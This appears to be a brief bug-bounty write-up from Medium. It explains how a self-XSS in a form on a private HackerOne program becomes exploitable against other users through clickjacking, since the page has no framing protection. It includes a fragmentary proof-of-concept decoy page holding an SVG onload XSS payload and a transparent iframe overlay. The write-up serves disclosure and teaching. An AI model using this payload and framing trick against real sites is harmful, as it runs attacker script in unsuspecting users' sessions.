Self XSS to Good XSS Clickjacking

Severity : High

Complexity: Easy

Weakness: Cross Site Scripting

  • While Testing one of the Private on HackerOne , I Land up on the following page.

  • Page contain’s Form To submit the detail’s of their application .


As soon as i started entering Payload in this Field , Pop up Appear’s .


Since Form is Vulnerable to Self XSS ,But Plus Point was There was No X-Frame-Header or Click-jacking Protection . Which Make’s the Attack Easier And Converted it to Well Working XSS on Other User’s .

Simple Demo POC:

<h1>Welcome to Click Games</h1>
Message :<input id="copy-text" type="text" value='"/><svg/onload=prompt(document.domain)>"'>
document.getElementById("copy-text").onclick = function(){;
alert("You'r Game Begins!")
iframe {
width: 600px;
height: 450px;
position: absolute;
top: 0; right: 10;
filter: alpha(opacity=50);
opacity: 0.1;
<iframe src=""></iframe></body>

Security Analyst

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store